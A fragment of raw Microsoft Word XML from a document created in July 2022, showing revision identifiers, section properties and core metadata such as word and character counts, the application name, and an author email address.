    <w:p w14:paraId="225BA0EC" w14:textId="77777777" w:rsidR="008850FC" w:rsidRDefault="008850FC"/>
    <w:sectPr w:rsidR="0088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AF"/>
    <w:rsid w:val="006C4463"/>
    <w:rsid w:val="008850FC"/>
    <w:rsid w:val="00A865AF"/>
    <w:rsid w:val="00D7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CE4A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{983635C3-1A01-4BA2-B647-2BEE891C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5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4069</Words>
  <Characters>23194</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>193</Lines>
  <Paragraphs>54</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>27209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karthikamcasmart@outlook.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>karthikamcasmart@outlook.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-04T09:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-04T09:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>